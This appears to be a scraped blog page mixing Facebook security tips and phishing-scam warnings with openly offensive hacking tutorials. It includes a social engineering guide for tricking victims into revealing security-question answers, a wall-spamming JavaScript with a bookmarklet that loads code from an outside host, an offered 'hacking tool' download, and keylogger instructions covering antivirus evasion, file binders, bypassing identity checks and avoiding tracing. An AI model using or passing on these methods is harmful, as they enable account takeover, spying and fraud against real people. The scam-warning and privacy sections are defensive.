• Facebook Rocks

    Go to Blogger edit html and replace these slide 1 description with your own words. ...

  • Facebook vs Twitter

    Go to Blogger edit html and replace these slide 2 description with your own words. ...

  • Facebook Marketing

    Go to Blogger edit html and replace these slide 3 description with your own words. ...

  • Facebook and Google

    Go to Blogger edit html and replace these slide 4 description with your own words. ...

  • Facebook Tips

    Go to Blogger edit html and replace these slide 5 description with your own words. ...

Browse Facebook On A Secure Connection (Https)

The main idea of HTTPS is to create a secure channel over an insecure network. This ensures reasonable protection from eavesdroppers and man-in-the-middle attacks, provided that adequate cipher suites are used and that the server certificate is verified and trusted.

The trust inherent in HTTPS is based on major certificate authorities that come pre-installed in browser software (this is equivalent to saying "I trust certificate authority (e.g. VeriSign/Microsoft/etc.) to tell me whom I should trust"). Therefore an HTTPS connection to a website can be trusted if and only if all of the following are true:

1.  The user trusts that their browser software correctly implements HTTPS with correctly pre-installed certificate           authorities.

2.  The user trusts the certificate authority to vouch only for legitimate websites without misleading names.

3.  The website provides a valid certificate, which means it was signed by a trusted authority. (an invalid certificate shows a warning in most browsers)

4.  The certificate correctly identifies the website (e.g. visiting https://example and receiving a certificate for "Example Inc." and not anything else [see above]).

5.  Either the intervening hops on the Internet are trustworthy, or the user trusts the protocol's encryption layer (TLS or SSL) is unbreakable by an eavesdropper.

            1.  For enabling secure conection (https) in facebook go to Account-->Account Settings

2. Click "change" belongs to Account Security

3. Check the Secure Browsing (https) and Save it! 
the diffrent bitween secure (https) and unsecre conection look like this on browser window



Facebook Hack method Social engineering

Now im going to talk about the concept of applying social engineering. I hear most people online say social engineering is easy, although to a certain degree i do agree, it seems most people forget the whole concept, at what makes someone, not only effective at what their doing, but social engineer their slave to a degree where the person would never know nor suspect that it was you.

I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before i talk about the 'Game', I want to go into detail about Basic knowledge and self preparation.

Basic knowledge and self preparation:
It's important like most things in life to be fully equiped and prepared to take on a task. I myself would suggest you have clear outlines of what your trying to achieve, be it to get someone's email password, explioting them for money, to get into a online game group/clan ect ect. In thi case the email and password of Facebook accaunt.

First of all, you need to take into consideration of what you will need, for this social engineering tutorial im going to outline this from an obtaining someone's email password perspective. Before i continue, i would like to stress some important factors you might want to take into consideration:

1) People are more open to you if they percieve you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.

I'm going to break these three points down to give you a better understanding of why this is:

In the case of 1)
nearly everyone seems to be more careless when they percieve you as an idiot, the main reason for that is, you don't consider someone who appears to be an idiot as a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedistel than you (never forget that!). Now there are things you need to remember however, although these things are true if you overplay your idiot persona it will not be good in your fotune. Always remember real morons are annoying as hell, you DO NOT want to put off the person your trying to social engineer(unless your trying to fail, then knock yourself out).

In the case of 2)
when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reenforcing the idea that "your a nice guy", it slowly allows the person to build a relationship of 'trust' with you.

in the case of 3)
also an obvious advisement, if you just pester someone for information without atleast pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why your probing them for person info.

With these three points made, i will now continue with my example of obtaining someone's Facebook Email and password. Before you go into detail, it's important to outline what you need to successfully social engineer the password out of someone. Now you could try to Social engineer them for their password, I advise you be a bit more intelligent and indirectly social engineer them for their password by obtaining their password recovery knowledge. Now it's important to what you need to successfully hack their account through recovery questions. You will need the following:

Their email adsress
Their accaunt password

With this in mind it's imperative you plan how you will obtain these details. I will tell you how i do it. But first i need you to understand, this whole trasnaction will not be completed over a course of a day, it can take days to weeks depending on the person. I suggest you talk to them and read them first. If their open, then you can do it within days, if their not then it would be better you spread this out over a week or two. I also want you to imagine what you will say, try to predict their answers and MOST OF ALL, think of a scapegoat on why your probing them for these answers, just incase your less than suttle and arouse suspicion, if they ever suspect you it will go from a flame to a fire it's important to stamp all of their doubt in you as soon as possible.

Now there are many ways you can obtain their password and addresse. Some people and post their address on their profiles. In which case this is easy pickins, however that is rare. So you need to devise a way of obtaining that info. Now you can pretend that you are from bank or somethin like this and ask for their email adress. Or you can pretend that you are some student an doing some research. Be creative

Now i need the answer to their security question, now you need to find out what the question is, i suggest pretend to recover password to see what it is or get the info for all of the recovery questions email asks. Im going to go with the first option and say for example their recovery question was : What is your dogs name?.

How I would go about obtaining this would be to pretend to have a pet of my own, i would start off the convo like so:

me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realise whats your dogs name, if you don't mind me asking.

It is important to add "if you don't mind me asking", because it gives the person a bit of power over you and also show's a little respect (once again reinforcing the notion your a nice fellow).

POINT: I wouldn't dive straight into "whats your dogs name" start with the breed first and remember try to predict what they will inturn ask (mines blah blah whats yours?).

With that in mind, I'm sure by now you can see how easy it is, to social engineer someone's password through the indirect method of password recovery. Now obviously most recovery questions wont be about pets mostly they're "mothers madien name" "place of birth" ect. But use the same logic and work around it, remember think every detail through and ask yourself this if someone gave you this story or asked you in a certian way would it seem legit to you?
and when you have the email adress, click on facebook, I forgot password and will be sent on your email.

The Game:

The game is basically, perfecting "self preparation". Social engineering is a game,. If you think about it in this way: each time trust is given to you, you advance a level, which each level you advance, your ability of obtaining infomation from this person becomes easier. In a sense mastering the ability to come up with more ingenius ways of manipulating someone, without arousing suspicion, is what seperates the lucky noobs from the elites.

When thinking about this as a game, you need to reflect on your goals. As I've mentioned before try to imagine the dialogue between you both, think about how you will obtain certain things and more importantly have clear directives. With this in mind i think we can now talk about how you might want to consider presenting yourself (only applies if the person is indeed a stranger).

So if you were going to go after a complete stranger, you should first try and get as much research on them as you can. For example, age, name. This is important for making up for fake identity. I would also suggest if you social engineer more than one person you write down, in detail! your differn't alias so you don't get confused. Nothing would be worse than using the wrong alias on the wrong person.

When building your identity decide on what would give you the biggest advantage with this person. This can be from faking your age to match the interests of this person, thus giving you the advange of being able to "click" with the person. Pretending to be a student or in a deadend job for sympathy manipulation or in the case of a deadend job, pretending to relate to the slave. There are many things you can do, as I've mentioned it depends on the circumstances you need.

Here are Some ebooks about social engineering which are very detailed (about 300 pages):

Facebook Hacking Tools 2013

This the latest application for Facebook Hacking tools in 2013. The developers of "Facewoops" (the codename of this stuff) said that this tools isn't a phising tools. When you use this application, u need to login for get a token authorization code from your ID Facebook API. then this tool will generate your token for get access to your friends target. That's why this tool need you to login first.

How it works?
If you understand about Facebook API, you will understand about this tool too :)
the developer Facewoops a.k.a M1kn1ck claims that he already has a facebook application to generate and exploiting facebook data from your friendlist, and then by using this tool, the sensitive data such as username, email, and password from your friendlist will get dump and send automatically to your private message.

How to use?
It's simple, you have to type your email and URL account, then find a target which u want to hack, copy his/her URL/email then press "Hack it" button, and then you will got a message from your target about email and password login. This message will not appear in target's inbox because it will deleted automatically.


Download :
Facewoops.rar | Password

Share if you get FUN with this :D

How Spammers Flooding Facebook Wall

Its a Simple trick to post a message on someone facebook wall in n number of times. here is the java scrip which is used to do this methord:

Facebook Wall Post java script :
var a = document.body.innerHTML;
var Num = prompt("Wall Flooder", "Please Enter Number of messages");
while (Num <= 0){
var Num = prompt("You can't use a number less than 1", "Please Enter Number of messages");
formx = a.match(/name="post_form_id" value="([\d\w]+)"/)[1];

dts = a.match(/name="fb_dtsg" value="([^"]+)"/)[1];
composerid = a.match(/name="xhpc_composerid" value="([^"]+)"/)[1];
var msg = prompt("Wall Flooder", "Enter your message");
target = a.match(/name="targetid" value="([^"]+)"/)[1];
while(i < Num){
var rn=Math.floor(Math.random()*1001);
pst = "post_form_id=" + formx + "&fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + target+ "&xhpc_context=home&xhpc_fbx=1&xhpc_message_te xt=" + encodeURIComponent(msg) + encodeURIComponent(" ") + encodeURIComponent(rn) + "&xhpc_message=" + encodeURIComponent(msg) + encodeURIComponent(" ") + encodeURIComponent(rn) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncReq uest";
with(newx = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded") , send(pst);
i += 1;
This is the javascript code we are going to use somewhere as a .js, or use my hosting @ http://hallwayinsider.com/a.js  After that, here's a breakdown of what you should do:

1. Host the script on a webserver if you want.. but i already have it hosted.
2. Paste this in your url bar (or if you're using chrome, press ctrl+shift+j, click on console and paste):
javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)
3. Follow instructions in the popup boxes do not use mozilla firefox and we are not responsible for this and this is only for educational purpose.

Top 5 Facebook Secret That You Should Know

The Meaning of the Term Poke Has Never Been Defined.

Facebook is explains how “poking” works on itshelp center page for poke but there’s no explanation to be found for the origin of the phrase why it is the secret of facebook?.  The most common meaning  is a friendly “nudge,”. It means what you want to think  Some people poke you because they think it's funny. Some people poke you because they like you. Others poke you because they're horny. Basically, there's no clear meaning to what the poke is, but it's just there to initiate conversation.Zuckerberg once responded to a question about what a poke meant on the social networking site with: “We thought it would be fun to make a feature that has no specific purpos. So mess around with it, because you’re not getting an explanation from us.”

Hide your personal Photos From a group of people.

your friends list that people you dont know personally you can take privacy steps to your photos by hiding from strangers. all you need to create a list for those are strangers for you. Click "Create a List," then find friends and add them to your new list and name your list something that you can remember Next click Privacy Settings Click "Custom" in the left panel, then "Customize settings" below the chart. Scroll down to that anything you want to hide click the drop down menu next to it, then click "Custom" yet again. Yes this takes a while. Facebook likes people to be open. finally under hide enter the name of the group you created and you are done! its the first thing about facebook secret.

Enable secure browsing and Login Notifications.

By enabling secure browsing we can able browse through a secure connection by changing HTTP to HTTPS. if u enable https it help to reduce your chance of geting loss your password. for enabling secure browsing go through Account setting and click security tab. under the security tab look up Seccure browsing
and then u can done!. login notification is one of the major facebook secret and security fuction in facebook. by enabling Login notification we can get notification for every login via email and text to registered mobile number. in every login notification email it have the device name and ip address that you or unknown person logged in to your account. and a link for recovering if the login was not authorised. to enable login notification go through Account setting and click security tab. under the security tab look the login notification and enable either you want notifications via email or texts or both. note if you want login notification via text then first you should register your account with facebook mobile.

customize Your facebook profile URL for peoples easy to find you.

By Creating A unique customized URL for your profile makes good mean to your account and peoples can find easily by just typing your username after the facebook.com. once create a username it will not able to change for any reason so you should care about the word you are going to select. You can personalize your Facebook URL (web address) by selecting a unique username. It will appear in the location bar of your browser after "https://www.facebook.com/" when you view your profile (timeline) or Page. for selecting the unique web address go through this link http://www.facebook.com/username  You Are Done!.

Why Facebook keeping blue color from the logo to mobile app?

It is the top one of the facebook secret. facebook is keeping the blue color from the starting the original faceboook thefacebook.com even in blue to the mobile app and even the facebook logo. the young facebook founder Mark Zuckerberg is color blind but can see blue. it is the true fact but it is not the reason why faceook is blue

Colors don’t matter much to Zuckerberg; a few years ago, he took an online test and realized that he was
 red-green color-blind. Blue is Facebook’s dominant color, because, as he said, “blue is the richest color for me - I can see all of blue and facebook is the not only internet brand love color the blue is the most popular and dominant color among the top 100 sites in the world.

Update: Emil Kostov sends this note on why Facebook maybe sticking with blue:

It is part of their well planned Marketing plan. Most colors distract and make the human eye focus on them while blue act as a transparent palette for 65% of time spending watching the main background aka index space. It is well known also that blue color is the nirvana for the brain, as well green. Well, their choice make the competition envy most of the time.

Wow!! Do You Remember This Photo? – Facebook Virus Allert!!

Scam Signature Messages:

Wow!! do you remember this photo? http://domain[dot]com/img

Why it’s a Scam:

This post shown in news feed as like an image file with the end of  'img' and if any one click the link it the user has an updated antivirus it will detect a malware like this below. the link takes into a malicious website
and ths scam is using multiple domain all of them ending with ' img '

If u are any one likely to click the link without any protection of anitvirus then you  infected with the HEUR: Trojan virus shown above.

How to Deal with this Scam:

If you are followed the scam through the link then you are sharing the same scam to your friends Because the scammer automatically share the scam signature message to your wall also for spreading. you need to remove this scam message by clicking the ' X ' mark shown by top right corner of the scam signature message after that clean up your browsing data. and run a complete system scan on your computer. and change your facebook password for account safety and check your facebook account there is any unwanted application found remove it that also for future safety.

Facebook Phishing Scam Threatens To Delete Accounts

There is new facebook scam spreading via emails that sends users to to fake email notification or warning from facebook The phishing messages are reportedly charging Facebook users with violating policy regulations by annoying or insulting other Facebook users. The messages are then said to ask for personal and financial information including Facebook login details and part of recipients' credit card numbers.

An example of a typical facebook pishing scam email message look like this below.

LAST WARNING : Your account is reported to have violated the policies that are considered annoying or insulting Facebook users. Until we system will disable your account within 24 hours if you do not do the reconfirmation.

Please confirm your account below:

[Link Removed]


The Facebook Team

Copyright facebook © 2011 Inc. All rights reserved.

According to the blog, recipients who click the link are shown a fake Facebook "Account Disabled" Web form. The form asks for Facebook login details including email, password, Facebook security question, Facebook security answer, the first six digits on the user's credit card number, and their country of residence.

Once the form is complete, the victims are taken to a second form labelled "Confirm to your webmail" that requests webmail programme and password. After this, the victims are take to a third bogus form, labeled "Terms of Service." This form again asks for user name and the first six digits of the user's credit card and warns victims that their accounts more or less will be lined up in front of a firing squad and shot at dawn unless they comply.

Another similar Facebook scam purporting to be from Facebook Security claimed to be watching out for users' accounts being accessed by unauthorized parties. Here's the text as per the blog:

Subject: Did you log into Facebook from somewhere new?

Dear [Username removed]

Your Facebook account was recently logged into from a computer, mobile device or other location you've never used before. We have reviewed your account activity, and we get information about possible unauthorized access to your Facebook. We have provided a warning to you via email, but you do not respond to our notification.

"Your account was accessed from a new location : Anonymous Proxy."

If you are not signing into your Facebook account from "Anonymous Proxy", your Facebook account may have been compromised. We recommend immediately verify your account by carefully on the link below to protect your Facebook account. It may take a few minutes of your time to complete your data.

Please be sure to visit the Facebook Service Account for further information regarding these security issues.


[link to scam page removed]


Note : If within 12 hours, you have not verified your account, then you have ignored our notifications. Therefore, your account is permanently suspended, and will not be reactivated for any reason.


Facebook Security Team

a screen shot below that message contain link to users fake log in page

Once  you entered the log in details u will never acces  your account agian you may be lose your account.
This email, which purports to be from social networking website, Facebook, claims that Facebook is about to implement a new login system. The message claims that Facebook users must follow a link in the message to update their details before they will be able to use the new system.

we sholud take care the URL of the link hav been in email messages sure that its starts from www.facebook.com

New Facebook Application Spreading That Completely Steal Your Account.

I got some emails. here is the 3 email messges below read it.


"?dmin S?curity
?dmin S?curity9:46pm Jun 25th
We have reviewed the suspension on your account. After reviewing your account activity, it is determined that you have violated our Terms of Service. We've issued a warning to you via email, but you do not respond to our notice. Therefore, your account will be permanently terminated, and will not be reinstated for any reason.

If you think this is a mistake, please verify your account at the link below. We will immediately review your account activity, and we will notify you again via email.

Verify your account immediately at the link below:


Please review your recent activity to make sure no one is using your Facebook account without permission. Reviewing your activity just take a few moments. We'll start by asking you a couple of questions to confirm that this is your account.

Note: If within 12 hours, you have not verified your account. Your account will disabled , because your do errors and omissions

Thank you for helping us in improving our level of security.

Facebook Inc. ™ Team
Copyright 2011 up © All rights reserved.
Terms of Use. Privacy Policy
1601 S. California Ave., Palo Alto, CA 9430
All rights reserved
phone: (650.543.4800) fax: (650.543.4801)
Facebook Security™"

screen shot

------------------------------------------------------------------------------------------------------------- 2.
T?ceboo? ?ecuriIy June 26 at 5:12am Report
You have violated the Terms of Service (TOS)

Your account immediately will be deactivated. Because some people and of the Security Team have reported your actions. Maybe you have written content that is offensive or upload images deemed insulting and harming others.

To defend against the allegations that have been alleged by the parties Security Team, please visit:

We provide 24 hours after you read this message to defend or re-confirm your facebook account. If not, we will block your account for the benefit of other users.

NOTE : We hope you do not reply to this message, because our automated system will not respond to every message you send

Facebook Security Team. Inc ™
By Copyright © 2011 Facebook, Inc. 

screen shot

------------------------------------------------------------------------------------------------------------- 3.

Fac?b?ok S?curity June 25 at 11:33pm Report
Dear Costumer Facebook,

Your Facebook account was recently logged into from a computer, mobile device or other location you've never used before. We have reviewed your account activity, and we get information about possible unauthorized access to your Facebook. We have provided a warning to you via email, but you do not respond to our notification.

“Your account was accessed from a new location : Anonymous Proxy.”

If you are not signing into your Facebook account from "Anonymous Proxy", your Facebook account may have been compromised. We recommend immediately verify your account by carefully on the link below to protect your Facebook account. It may take a few minutes of your time to complete your data.

Please be sure to visit the Facebook Service Account for further information regarding these security issues.

Note : If within 12 hours, you have not verified your account, then you have ignored our notifications. Therefore, your account is permanently suspended, and will not be reactivated for any reason.

Facebook security™
Facebook, Inc. P.O. Box 10005, Palo Alto, CA 94303.

screen shot
all i need to say that we should take care of this type of a application http://apps.facebook.com/accounts-suport-help/ http://apps.facebook.com/verifi_privacy_info/ http://apps-facebook-help-center-account-verification.tk/
It doesn't work this way if facebook need you to verify...
and please notice the link
http://apps <<< this is a facebook application link
I guess someone create an application which requires you to enter email address AND password so that they can "steal" your account.

Facebook Introduces Microsoft’s Photo DNA Technology

What is Photo DNA and how it works

Like the Human DNA, every Photo that you take, share and edit has its own pattern like the DNA which is almost unique for each and every other photos. And that is the theory which is used by the Microsoft to develop the amazing technology called Photo DNA. Photo DNA is based on digital photography fingerprint extraction which can be used to create associations to identify similarities between a certain photo and other images posted on the internet. PhotoDNA is currently used to check the data and photo’s stored on the SkyDrive and Bing services. Up to this point more than two billion images have been classified via PhotoDNA which has led to the identification of over 1000 similarities on SkyDrive and more than 1500 on Bing. See this video to know how it works;

Why Facebook implemented Photo DNA

In a growing network like Facebook, the chances are great to promote pornography and there is only one way to prevent this exploitation against children and also to others, that is by using the Photo DNA technology. The child Pornography is increasing a lot these days particularly in United States after the invention of Internet. So, its important that Social Networking sites like Facebook should implement the technology like this. Know more about Photo DNA and why Facebook implemented Photo DNA? See this video which explains why Facebook adopted PhotoDNA and how their implementation will help curb the spread of online child exploitation.

Facebook Hack first method: Keyloggers

Hello people

Today I will write one tutorial about how to hack Facebook which includes keyloggers and dealing with a lot of problems along the way. This tutorial will be highly detailed with everything, including some thing you will need and all the thinking process necessary to successfully hack a Facebook account.

The tutorial inludes:
1) Keyloggers
2) How not to get traced
3) Regaining Access - New Retrieval method

Why am I writing this? Well, I am a hacker and many people asked me about hacking Facebook accaunts and i decided to tell the worl how you can hack Facebook
Not only that, but  all the other tutorials regarding 'How to Hack Facebook' are outdated and no longer work because they are not including the security updates that Facebook implemented not so long ago.

Well I will make more tutorials about hacking Facebook and Facebook security.

Let's begin.

I have seen that 99.9% of the tutorials about Facebook hacking is now recommend Phishing, keylogging, RATing, and even Social Engineering (SE) as the most notable methods to take over a Facebook account. In this tutorial I will explain only keyloggers but i will be back with moer and more tutorials.

Before, we go any further. Let me say that Facebook cannot be hacked with a program of any kind.If you see anyone claiming that they have a program to hack Facebook, they are lying.
Things about “Facebook hacker 100% working“ and similar things is 100% not working.

Now, what are keyloggers?

-Key loggers only record the keys pressed on the keyboard. You need to set up a keylogger and than place the file in victims computer. That will record anything what he/she type in the computer. The program will upload the .txt file on FTP or send you an email whit everything what is typed in victim keyboard, which include Facebook password.

1. KEYLOGGERS: I recomend Ardamax keylogger:
(you need to fill up a survey to download file, it's nothing dont worry )


When you unpack the program your antivirus will detect the program as a virus, but don't wory almost every antivirus program will detect it like a virus because it is a spyware but it can't damage your coputer.
note:if you want to remove ardamax keylogger from your computer, or from another, this is aklremover and just duble click and it will dissapear.
Why Ardamax? Sincerely I don't know, i used many keylogger and this are the simplest for me. Download whatever you want but the use of this is very simple and you don't need any tutorials or something similiar.
When you set up the keylogger you made your server or bot, or whatever you want to call it, FUD (Full undetected), being not detected by any Anti Virus or at least UD (Undetected), being only being detected by some rare Anti virus.

Why crypt? Well, so your file doesn't get detected and immediately deleted as soon as the target opens the file.
I assume that someone of you don't know how to set up a keylogger but i will make some tutorials very soon. It will be posted on my blog.

Even if you do manage to steal the password and e-mail using Keyloggers, the problem of suspicion will appear.

The IP adress. If you already have his IP or location through other methods such as reverting you're good to go.

However, if you do not have any information at all what so ever, you can try searching on these sites to revert info about the target.







Now, once you have an IP or ISP, or location the next part is looking for a Sock5 to hide behind so Facebook thinks that you are only using a different computer in the same area. You can also spoof the IP, but I will not go into that.

So, after all that work, you still can't take over their accounts?

Matching Faces

I thought about this method as I was showing a friend through Teamviewer the pictures that Facebook was showing me to identify the target's friends. And obviously, I was clueless because I did not know of the people.

What did I do? Well, as you can see the pictures:
(when you clic on the pictures, afther 5 seconds yust clic skip add)

Security question

Confirm Identity

Confirm identity by identifying the friends on that account.

Facebook provides the names of the target's friends. So, use that information to essentially bypass the security of identification by searching those names on Facebook search and matching the faces based on the Target's friends.

It will only ask you match faces if you are logging in with the correct password or if you get picked up from a different location.

Note that will need an extra Facebook account to search, otherwise Facebook does not let you search. Close the 'Suspicion' page and log in to your extra or your actual Facebook account and search for the Target's friends.

Be sure to notice where your target lives so on the results you can compare whether if the friend is the matching face or not. Be sure to notice the names of the friends as well.

For example, if the name choices are:
George Bush
Adolf Hitler
Barrack Obama
Mohammed Ali
Lee Chang

And the picture given is of an middle eastern descent looking person, you should obviously go with the name that sounds middle eastern.

Once you match the faces for the identification questions. You should be able to get in without a problem.

To wrap it up,

I will warn you one one important thing, if you do not have access to their e-mails. They will get an e-mail notifying that someone is trying to log in on their accounts and your IP will be shown to them.

So, what that means is to always hide behind a VPN or a proxy so you can't be traced back.

Try to take over their e-mails if you want or simply delete the notification e-mails so they do not notice.

Taking over the e-mail will be an obvious sign that they got hacked and they might try to retrieve the e-mail password, so be sure to change the e-mail password and security questions immediately so they cannot get it back. Only take over the e-mail once you have completely stolen and gained access to the Facebook account because they can easily change the e-mail on the Facebook account and you'll be screwed.

3) Regaining access

[b]This is a new section on the tutorial which I decided to include since it's important to know if accidents were to happen.

Person updates their security

Person continues updating security

Person finishes security

So, what this means is that you will be left out of their account if they update their security information and you will have to bypass all the security measures all over again.

This is what you will see:

This is what will show telling you "You used an old password"

This picture shows that you have logged in with their old password, and will ask to confirm that it's in fact you.

The options to using old password.

This will give you the options of how you confirm that it's in fact you.

Identify your account (Note that you are the one who has to identify yetagain)

I chose to confirm using profile URL. There are a variety to choose from.

Linking to profile

I linked it here.
Applying CATCHA security

Fill out CAPTCHA.

My account has been hacked and I have access to my login e-mail
Confirm My Account

This is the page where you could retrieve Facebook into sending you the new password to their e-mail (If you have access) or even perhaps a different e-mail. Make your story sound as believable as possible, so don't type like you are 10 years old.

Well, I believe that this is all I have to say. In a few days I will update my blog whit more Facebook hacking tutorials so stay on the blog and keep reading it.

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Facebook hack: keylogger detailed

Hello people: In this tutorial I will explain you what is a keylogger in a very detailed way. So lets begin.Keyloggers can be classified into two main types:
1. Hardware Keylogger
2. Software Keylogger
1. A hardware keylogger is also used for keystroke logging, a hardware keylogger is plugged between the keyboard plugand the USB or PS/2 port socket, and they work with PS/2keyboardsand also usb keyboards,

A hardware keylogger is just like a normal USB drive or any other computer peripheral so that the victims can never doubt that it is a keylogger. Hardware keylogger has any inbuilt memory which stores the typed keystrokes.
But i think you will use software keylogger because it can be found free and i don't know anyone who use hardware keylogger. Ant the most inportant thing, you must have acces to victim computer to set up a software keylogger
2.  So here our story begin. The software keylogger can be classified in two types local keylogger and remote keylogger.
Local Keyloggers are used to monitor local computers (May be your own Pc), they are very easy to install and are completely undetectable and it’s really hard to figure out once a keylogger is installed on a computer because usually keyloggers hide themselves from
taskmanager, Windows Registry etc. Whenever you want to see logs, screenshots etc you just need to press a hotkey which (ex. 
Shift+Ctrl+F10). There are hundreds of keyloggers available now days.
Remote keyloggers are used for the purpose of monitoring a remote pc, Once a remote keylogger is installed on your computer the
attacker can get your keystrokes, your webcam shots, chat logs etc 
sitting in any part of the world. You can find tons of Remote keyloggers on web but lots of them are either not capable of properly recording keystrokes or they have a high antivirus detection rate, With my experience of hacking I have tested over 50 different and I thing the best is ardamax. I don't know maybe you will find some better and simpler. Now if you dont know i will explain you how some keylogger works. In your computer you install some keylogger witch is detected like a virus by some antivirus. Thats why you must turn of antivirus before you instal this. Now when is instaled you run it, and a new window pop up. Here you enter where it will upload informations, everything what is typed in keyboard, screnshots and so one. I recomend FTP, the database on internet where you have your storage. Later when the set up is over you get the .exe file. This file  you put in some other computer and it record everything wha the victim type in there. And that's it now you just have to wait that the victim type in what you want( facebook password and email)

Here is a video tutorial about how to set up ardamax keylogger:

Additionally: Binders
A binder is small piece software used to bind or combine to or more files under one name and extension. As some of you might know that most of viruses come with .exe extension so the victim can get suspicious and is less likely to run the file. With binders you can easily bind a file
with .exe extension with other extensions such as .mp3, .bat, .jpeg.
One popular Binder is: Easy Binder
Download here:
(you need to fill up a survey to download file, it's nothing dont worry )
Easy Binder v.

Hope it helped,